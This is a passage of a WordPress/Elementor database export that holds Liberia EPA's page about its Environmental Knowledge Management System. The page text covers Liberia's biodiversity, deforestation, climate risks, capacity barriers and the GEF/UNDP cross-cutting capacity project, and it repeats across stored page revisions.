Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p style=\\\"background-color: lightgray;\\\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\"}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(34486,4993,'_elementor_pro_version','3.3.6'),(34487,4994,'_elementor_edit_mode','builder'),(34488,4994,'_elementor_template_type','wp-page'),(34489,4994,'_elementor_version','3.4.0'),(34490,4994,'_wp_page_template','default'),(34491,4994,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\"}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in 